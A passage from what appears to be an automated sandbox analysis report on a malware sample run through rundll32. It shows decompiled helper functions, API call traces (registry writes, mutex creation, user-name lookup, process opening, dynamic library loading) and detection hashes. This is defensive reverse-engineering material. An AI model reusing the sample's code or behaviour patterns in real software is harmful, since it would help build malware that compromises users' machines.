					_v12 = _t10;
					if(_t10 == 0 || _t19 != _t10) {
						break;
					}
					_t19 = _t19 + 0x104;
					E6E1A1397(_t23);
					_t23 = E6E1A1000(_t19 + _t19);
					if(_t23 != 0) {
						continue;
					}
					break;
				}
				_t20 = 0;
				if(_t23 == 0) {
					goto L8;
				}
				if(_v12 == 0) {
					_t20 = GetLastError();
					E6E1A1397(_t23);
				} else {
					 *_a4 = _t23;
				}
				goto L9;
			}

0x6e1a1ae8
0x6e1a1aeb
0x6e1a1af5
0x6e1a1af9
0x6e1a1b4e
0x6e1a1b50
0x6e1a1b51
0x6e1a1b56
0x00000000
0x00000000
0x00000000
0x6e1a1afb
0x6e1a1afb
0x6e1a1b00
0x6e1a1b06
0x6e1a1b0b
0x00000000
0x00000000
0x6e1a1b12
0x6e1a1b18
0x6e1a1b26
0x6e1a1b2a
0x00000000
0x00000000
0x00000000
0x6e1a1b2a
0x6e1a1b2c
0x6e1a1b30
0x00000000
0x00000000
0x6e1a1b35
0x6e1a1b45
0x6e1a1b47
0x6e1a1b37
0x6e1a1b3a
0x6e1a1b3a
0x00000000

APIs

Part of subcall function 6E1A1000: HeapAlloc.KERNEL32(00000000,?,6E1A15ED,00000030,74E063F0,00000000), ref: 6E1A100C

GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,6E1A1668,?), ref: 6E1A1B00
GetLastError.KERNEL32(?,?,?,6E1A1668,?), ref: 6E1A1B3E

Part of subcall function 6E1A1397: HeapFree.KERNEL32(00000000,?,6E1A1B4C,00000000,?,?,?,6E1A1668,?), ref: 6E1A13A3

Strings

@Mt MtTt, xrefs: 6E1A1B3E

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocErrorFileFreeLastModuleName
String ID: @Mt MtTt
API String ID: 1691993961-608512568
Opcode ID: b5832cfaa479a67552d9289fc704f5b13be22937914708af654e86ef9e9d0b76
Instruction ID: 202a9e64cfbc809e529367d0972d5da915abc51d48fd07045227f11e099cfd49
Opcode Fuzzy Hash: b5832cfaa479a67552d9289fc704f5b13be22937914708af654e86ef9e9d0b76
Instruction Fuzzy Hash: 0201DDBAB0051567C7119BED8C549BF7EBDEF857A0B114121E741D7140F670C8C9A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B027C7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00B027C7(void* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t9;
				signed int _t11;
				intOrPtr _t12;
				struct HINSTANCE__* _t14;
				intOrPtr _t17;
				intOrPtr _t20;

				_t9 =  *0xb0d2d8;
				_v8 = _v8 & 0x00000000;
				_t20 =  *0xb0d28c; // 0x1f8
				if(_t9 != 0) {
					L2:
					if(_t20 != 0) {
						_t11 =  *_t9(_t20,  &_v8);
						if(_t11 == 0) {
							_v8 = _v8 & _t11;
						}
					}
					L5:
					return _v8;
				}
				_t12 =  *0xb0d2e0; // 0xdca5a8
				_t3 = _t12 + 0xb0e0af; // 0x4e52454b
				_t14 = GetModuleHandleA(_t3);
				_t17 =  *0xb0d2e0; // 0xdca5a8
				_t4 = _t17 + 0xb0e9ea; // 0x6f577349
				 *0xb0d2ac = _t14;
				_t9 = GetProcAddress(_t14, _t4);
				 *0xb0d2d8 = _t9;
				if(_t9 == 0) {
					goto L5;
				}
				goto L2;
			}

0x00b027cb
0x00b027d0
0x00b027d5
0x00b027dd
0x00b02813
0x00b02815
0x00b0281c
0x00b02820
0x00b02822
0x00b02822
0x00b02820
0x00b02825
0x00b0282a
0x00b0282a
0x00b027df
0x00b027e4
0x00b027eb
0x00b027f1
0x00b027f7
0x00b027ff
0x00b02804
0x00b0280a
0x00b02811
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(4E52454B,00000000,?,?,00B026C2,?,00000001,?,?,?,00B01900,?), ref: 00B027EB
GetProcAddress.KERNEL32(00000000,6F577349), ref: 00B02804

Strings

Nt, xrefs: 00B02804

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: Nt
API String ID: 1646373207-3999644925
Opcode ID: ba0a03b3355ad58bbaddf75f1be6870d68f22c0a2450eb90ff52c9cd80df0d46
Instruction ID: face6c6a5b708e1cf9b3595d4d122d84e9828488737eec1e741c761c5788cd3a
Opcode Fuzzy Hash: ba0a03b3355ad58bbaddf75f1be6870d68f22c0a2450eb90ff52c9cd80df0d46
Instruction Fuzzy Hash: ADF06275901306DFDB05CBD8DD48A9A77ECEF28314B104198E401D32A0EB74EE09CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B60D80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B5B8B7: RegCreateKeyA.ADVAPI32(80000001,0434B7F0,?), ref: 00B5B8CC
Part of subcall function 00B5B8B7: lstrlen.KERNEL32(0434B7F0,00000000,00000000,00000000,?,?,?,00B54C3E,00000000,?,7673D3B0,74E05520,?,?,?,00B51F86), ref: 00B5B8F5

RegSetValueExA.ADVAPI32( Ut,00000000,00000000,00000000,7673D3B0,00000000,00000001, Ut,7673D3B0,00000000,00000000,?,00B5FD43,?,00000000,00000000), ref: 00B60DB2
RegCloseKey.ADVAPI32(?,?,00B5FD43,?,00000000,00000000,00000000,7673D3B0,00000000,74E05520), ref: 00B60DCB

Strings

Ut, xrefs: 00B60D8C, 00B60DBD, 00B60DAF, 00B60D8F

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CloseCreateValuelstrlen
String ID: Ut
API String ID: 1356686001-8415677
Opcode ID: 99191b27f18d27d3c3fa45da524d73ee60838bbb2f15696399988db727e1e86f
Instruction ID: 7a1af06ed684f25daaa86cefa85c1ddcd19da256ec7cd8d446a872f5b0834d82
Opcode Fuzzy Hash: 99191b27f18d27d3c3fa45da524d73ee60838bbb2f15696399988db727e1e86f
Instruction Fuzzy Hash: FAF0F436911119FBCF12AF95DD05CDEBBBAEF043A1B0041A1FE05A6170DB719E20EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B02291, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B02291(CHAR* _a4) {
				long _t9;
				CHAR* _t10;

				_t10 = 0;
				_t9 = ExpandEnvironmentStringsA(_a4, 0, 0);
				if(_t9 != 0) {
					_t10 = E00B075F6(_t9);
					if(_t10 != 0 && ExpandEnvironmentStringsA(_a4, _t10, _t9) == 0) {
						E00B04AAB(_t10);
						_t10 = 0;
					}
				}
				return _t10;
			}

0x00b0229a
0x00b022a4
0x00b022a8
0x00b022b0
0x00b022b4
0x00b022c3
0x00b022c8
0x00b022c8
0x00b022b4
0x00b022cf

APIs

ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00B01083,73797325), ref: 00B022A2

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00B022BC

Part of subcall function 00B04AAB: RtlFreeHeap.NTDLL(00000000,00000000,00B05012,00000000,?,?,00000000), ref: 00B04AB7

Strings

PGt, xrefs: 00B02292

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentExpandHeapStrings$AllocateFree
String ID: PGt
API String ID: 1564683301-293773470
Opcode ID: 68bdf06f162cd6049d0411e3cf75595610d9040c2baba9693e547fdbdfb1d89e
Instruction ID: 4f80d4023d43723b08e8cacef6b2ecdba0f90cd35cf45a6efb3b3ad092fe4dd1
Opcode Fuzzy Hash: 68bdf06f162cd6049d0411e3cf75595610d9040c2baba9693e547fdbdfb1d89e
Instruction Fuzzy Hash: 14E04F3260253266C2325BAA4C48D9BDEECEFE6BF131501A5FA08D3261DB10CC15C2F4

Uniqueness

Uniqueness Score: -1.00%

Function 00B6C0B6, Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B6C380

Part of subcall function 00B51AE3: GetModuleHandleA.KERNEL32(?,00000020), ref: 00B51B08
Part of subcall function 00B51AE3: GetProcAddress.KERNEL32(00000000,?), ref: 00B51B2A
Part of subcall function 00B51AE3: GetProcAddress.KERNEL32(00000000,?), ref: 00B51B40
Part of subcall function 00B51AE3: GetProcAddress.KERNEL32(00000000,?), ref: 00B51B56
Part of subcall function 00B51AE3: GetProcAddress.KERNEL32(00000000,?), ref: 00B51B6C
Part of subcall function 00B51AE3: GetProcAddress.KERNEL32(00000000,?), ref: 00B51B82

Part of subcall function 00B65C07: memcpy.NTDLL(?,?,00B5B0CC,?,?,?,00B6FA0E,?,?,?,?,?,00000000), ref: 00B65C7B
Part of subcall function 00B65C07: memcpy.NTDLL(?,?,?), ref: 00B65CE2

memcpy.NTDLL(?,?,?,00B6FA0E,?,?,?,?,?,00000000), ref: 00B6C22F

Part of subcall function 00B5DD00: GetModuleHandleA.KERNEL32(?,?,?,00B6C2ED,?,?,?,00000000), ref: 00B5DD3E
Part of subcall function 00B5DD00: memcpy.NTDLL(?,00B8136C,00000018,?,?,?), ref: 00B5DDBA

memcpy.NTDLL(?,?,00000018,00B6FA0E,?,?,?,?,?,00000000), ref: 00B6C27D
memcpy.NTDLL(?,00B60FB5,00000800,?,?,?,00000000), ref: 00B6C300

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: memcpy$AddressProc$HandleModule$memset
String ID:
API String ID: 1554640953-0
Opcode ID: 938724124f68ddf6a87deb8d43d07097964fa991288739b8bb984c1fe5d62de5
Instruction ID: b7efa5cfa470fa6462e0e23e45de4dc943ee3a1a248a5a722e8b6f781aeb5ab3
Opcode Fuzzy Hash: 938724124f68ddf6a87deb8d43d07097964fa991288739b8bb984c1fe5d62de5
Instruction Fuzzy Hash: 86A14A71A0020AEFCF11DF98C884BAEBBF4FF04304F1485A9E855A7251E738AE55DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00B54A93, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B54AB9
memcpy.NTDLL ref: 00B54AE1

Part of subcall function 00B7186D: RtlNtStatusToDosError.NTDLL(00000000), ref: 00B718A5
Part of subcall function 00B7186D: SetLastError.KERNEL32(00000000), ref: 00B718AC

GetLastError.KERNEL32(00000010,00000218,00B79D1D,00000100,?,00000318,00000008), ref: 00B54AF8
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00B79D1D,00000100), ref: 00B54BDB

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Error$Last$Statusmemcpymemset
String ID:
API String ID: 1706616652-0
Opcode ID: b6c36a4fe9cda15d9be1a46ec753bb05251ff47cb203e602c825cba0b223de79
Instruction ID: 442c11d72ed1a07a1f8aec6e6605e1c7b864a1cfbec3d21abddd2879863ece46
Opcode Fuzzy Hash: b6c36a4fe9cda15d9be1a46ec753bb05251ff47cb203e602c825cba0b223de79
Instruction Fuzzy Hash: F7417FB1504301AFD721DF24CC45F9BB7F8EB98315F0089A9F999C6251E730D5588B62

Uniqueness

Uniqueness Score: -1.00%

Function 00B6E2AF, Relevance: 5.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B6E2FA
memset.NTDLL ref: 00B6E311
memset.NTDLL ref: 00B6E328
memset.NTDLL ref: 00B6E340

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 0def5dd61bd1c852d4baac5199b2628465adc817e8b5b2da11c07e22cd1288a7
Instruction ID: b8f52ffde1d6f2e07c58fe41d00e05b04a54cbe76860e18f92d8cf3d6de1aa5a
Opcode Fuzzy Hash: 0def5dd61bd1c852d4baac5199b2628465adc817e8b5b2da11c07e22cd1288a7
Instruction Fuzzy Hash: 2A2102B6500509BFCB229F60DC81A6A7BB9FF09305B050298F98597D11C336F9B4CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 00B01EC1, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00B01EC1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00B075F6(_t2);
				if(_t34 != 0) {
					_t30 = E00B075F6(_t28);
					if(_t30 == 0) {
						E00B04AAB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00B0A971(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00B0A971(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00b01ec1
0x00b01ecb
0x00b01ecd
0x00b01ed3
0x00b01ed3
0x00b01edc
0x00b01ee0
0x00b01eec
0x00b01ef0
0x00b01f64
0x00b01ef2
0x00b01ef2
0x00b01ef6
0x00b01efb
0x00b01f00
0x00b01f1a
0x00b01f09
0x00b01f09
0x00b01f0d
0x00b01f10
0x00b01f15
0x00b01f15
0x00b01f1f
0x00b01f47
0x00b01f4d
0x00b01f50
0x00b01f21
0x00b01f23
0x00b01f2b
0x00b01f36
0x00b01f3b
0x00b01f3b
0x00b01f57
0x00b01f5e
0x00b01f5f
0x00b01f5f
0x00b01ef0
0x00b01f6f

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00B05405,00000000,00000000,74E481D0,018D9618,?,?,00B02A8A,?,018D9618), ref: 00B01ECD

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

Part of subcall function 00B0A971: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00B01EFB,00000000,00000001,00000001,?,?,00B05405,00000000,00000000,74E481D0,018D9618), ref: 00B0A97F
Part of subcall function 00B0A971: StrChrA.SHLWAPI(?,0000003F,?,?,00B05405,00000000,00000000,74E481D0,018D9618,?,?,00B02A8A,?,018D9618,0000EA60,?), ref: 00B0A989

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B05405,00000000,00000000,74E481D0,018D9618,?,?,00B02A8A), ref: 00B01F2B
lstrcpy.KERNEL32(00000000,74E481D0), ref: 00B01F3B
lstrcpy.KERNEL32(00000000,00000000), ref: 00B01F47

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 05e78145ca126052259578fe6edf46d7ad846c9b675ce79d07a80608b5a18725
Instruction ID: 28508815ed3249e1d9decbb423e4f5678b356abe1c6cc1a6d902361c4a4bfe9f
Opcode Fuzzy Hash: 05e78145ca126052259578fe6edf46d7ad846c9b675ce79d07a80608b5a18725
Instruction Fuzzy Hash: F421A272504256EFCB065F78CC84AAE7FF8EF15384B158594FD049B252EB70D90087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7082C, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00B52AFA,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,00B68655), ref: 00B70838

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

Part of subcall function 00B79464: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,00B70866,00000000,00000001,00000001,?,?,00B52AFA,00000000,00000000,00000000,00000008,0000EA60), ref: 00B79472
Part of subcall function 00B79464: StrChrA.SHLWAPI(00000000,0000003F,?,?,00B52AFA,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,00B68655,?,?), ref: 00B7947C

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B52AFA,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 00B70896
lstrcpy.KERNEL32(00000000,00000000), ref: 00B708A6
lstrcpy.KERNEL32(00000000,00000000), ref: 00B708B2

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 1405a25099cf8960f11e79703d3c977e80d67e3139355cb25d331097720b8456
Instruction ID: 017312eed75f340409681455a23599f5ff00ff71a54607809ee2203220938774
Opcode Fuzzy Hash: 1405a25099cf8960f11e79703d3c977e80d67e3139355cb25d331097720b8456
Instruction Fuzzy Hash: B3219D72514255EBCB12AF64CC85A9A7FF8DF05394B05C0D6F819AB212DB30CA459BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00B6069D, Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00B606D1
memset.NTDLL ref: 00B606E8
memset.NTDLL ref: 00B606FF
memset.NTDLL ref: 00B60717

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: d79314098234e02b7e47209390a21b0051e8440e318296f5df4455007d940b36
Instruction ID: 984a18fbad9a278734d71357f35191d9425d96791b9845505896a5799bae5cc5
Opcode Fuzzy Hash: d79314098234e02b7e47209390a21b0051e8440e318296f5df4455007d940b36
Instruction Fuzzy Hash: FD11A0B2500509BFCB10AFA2DC81EABB7A9FF09305B0505A8F94491812D776BDB5DFD1

Uniqueness

Uniqueness Score: -1.00%

Function 00B0131E, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0131E(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00B075F6(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00b01333
0x00b01337
0x00b01341
0x00b01346
0x00b0134b
0x00b0134d
0x00b01355
0x00b0135a
0x00b01368
0x00b0136d
0x00b01377

APIs

lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,018D9364,?,00B050AD,004F0053,018D9364,?,?,?,?,?,?,00B054EF), ref: 00B0132E
lstrlenW.KERNEL32(00B050AD,?,00B050AD,004F0053,018D9364,?,?,?,?,?,?,00B054EF), ref: 00B01335

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,00B050AD,004F0053,018D9364,?,?,?,?,?,?,00B054EF), ref: 00B01355
memcpy.NTDLL(74E069A0,00B050AD,00000002,00000000,004F0053,74E069A0,?,?,00B050AD,004F0053,018D9364), ref: 00B01368

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 030a376f0050aaca4649147f6a81cf256329f25f872d1dc20eb086ff35919918
Instruction ID: 5a27320e9eb25afb071334ca4cca3c4d0577070f6725ae47069b176d61435b37
Opcode Fuzzy Hash: 030a376f0050aaca4649147f6a81cf256329f25f872d1dc20eb086ff35919918
Instruction Fuzzy Hash: 2DF0EC76900119BBCB15DBA9CC45C9F7BACEF493547154462FD04D7112EA31EA149BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B6F1DE, Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(69B25F44,?,?,00000000,00B675D0,00000000,?,69B25F44,?,?,?,?,?,69B25F44,?,00000000), ref: 00B6F1EF
lstrlen.KERNEL32(?,?,?,?), ref: 00B6F1F4

Part of subcall function 00B55E9A: RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 00B6F210
lstrcpy.KERNEL32(00000000,?), ref: 00B6F22E

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: lstrlen$AllocateHeaplstrcpymemcpy
String ID:
API String ID: 1697500751-0
Opcode ID: d04f649b9fd06d4f4d0b8c3186573d71a1b045af60639e6f9504d269ffdc3aae
Instruction ID: 0ea6544481966b2f3ae004f3294cabdb8ffe0585dfa331d66cedd9974048e3ab
Opcode Fuzzy Hash: d04f649b9fd06d4f4d0b8c3186573d71a1b045af60639e6f9504d269ffdc3aae
Instruction Fuzzy Hash: 18F0C27B400B42EBD72196A9BC4CE67BBD8EF85311B0404A5F90483115D725C8148F71

Uniqueness

Uniqueness Score: -1.00%

Function 00B038CA, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(018D9AF0,00000000,00000000,7691C740,00B0467E,00000000), ref: 00B038DA
lstrlen.KERNEL32(?), ref: 00B038E2

Part of subcall function 00B075F6: RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

lstrcpy.KERNEL32(00000000,018D9AF0), ref: 00B038F6
lstrcat.KERNEL32(00000000,?), ref: 00B03901

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 258019cd33875bfab471ed78c43d9bd49f439cb7b12b7b5928d84a3a4e903481
Instruction ID: 0ab90a80045a13ea7a63c71a0dbdcc43d1d83f5f648ccd6d4cd3212292faa487
Opcode Fuzzy Hash: 258019cd33875bfab471ed78c43d9bd49f439cb7b12b7b5928d84a3a4e903481
Instruction Fuzzy Hash: 0EE09233901220ABC7119BE8AC48C5BBFEDEFA96503040516FA00D3111DB20D901CBE1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6388 Parent PID: 6392 rundll32.exeCOMMON

Executed Functions

Function 033565CE, Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL(03371488), ref: 033565EC

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

memset.NTDLL ref: 0335661D
RtlInitializeCriticalSection.NTDLL(0644C0A0), ref: 0335662E

Part of subcall function 03360D43: RtlInitializeCriticalSection.NTDLL(03371460), ref: 03360D67
Part of subcall function 03360D43: RtlInitializeCriticalSection.NTDLL(03371440), ref: 03360D7D
Part of subcall function 03360D43: GetVersion.KERNEL32(?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03360D8E
Part of subcall function 03360D43: GetModuleHandleA.KERNEL32(00001623,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03360DC2

Part of subcall function 0334DA96: RtlAllocateHeap.NTDLL(00000000,-00000003,77639EB0), ref: 0334DAB0

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,033477C7,?), ref: 03356657
GetLastError.KERNEL32(?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03356668
CloseHandle.KERNEL32(000003F4,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0335667C
GetUserNameA.ADVAPI32(00000000,?), ref: 033566C5
RtlAllocateHeap.NTDLL(00000000,?), ref: 033566D8
GetUserNameA.ADVAPI32(00000000,?), ref: 033566ED
NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0335671D
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03356732
GetLastError.KERNEL32(?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0335673C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03356749
GetShellWindow.USER32 ref: 03356764
GetWindowThreadProcessId.USER32(00000000), ref: 0335676B
memcpy.NTDLL(03371354,?,00000018,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 033567A7
CreateEventA.KERNEL32(03371248,00000001,00000000,00000000,?,?,?,?,?,?,?,033477C7,?), ref: 03356825
RtlAllocateHeap.NTDLL(00000000,00000018), ref: 0335684F
OpenEventA.KERNEL32(00100000,00000000,0644B9D0,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03356877
CreateEventA.KERNEL32(03371248,00000001,00000000,0644B9D0,?,?,?,?,?,?,?,033477C7,?), ref: 0335688C
GetLastError.KERNEL32(?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 03356892
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0335692A
SetEvent.KERNEL32(?,03360CD6,00000000,00000000,?,?,?,?,?,?,?,033477C7,?), ref: 033569C0
RtlAllocateHeap.NTDLL(00000000,00000043,03360CD6), ref: 033569D5
wsprintfA.USER32 ref: 03356A05

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
String ID:
API String ID: 3929413950-0
Opcode ID: 10403b42190ad50521a4fac08062cd3a3d8d9340e0aa12b1c6b9f4095ea55078
Instruction ID: 2c5b6740e5c981f58c5a7bba2783cc0014937137a0e832623871a2a51a62bd57
Opcode Fuzzy Hash: 10403b42190ad50521a4fac08062cd3a3d8d9340e0aa12b1c6b9f4095ea55078
Instruction Fuzzy Hash: BAC149B69043489FC720EF66ECCAD2ABBECEB85711F44991DF956CB204D734A444CB51

Uniqueness

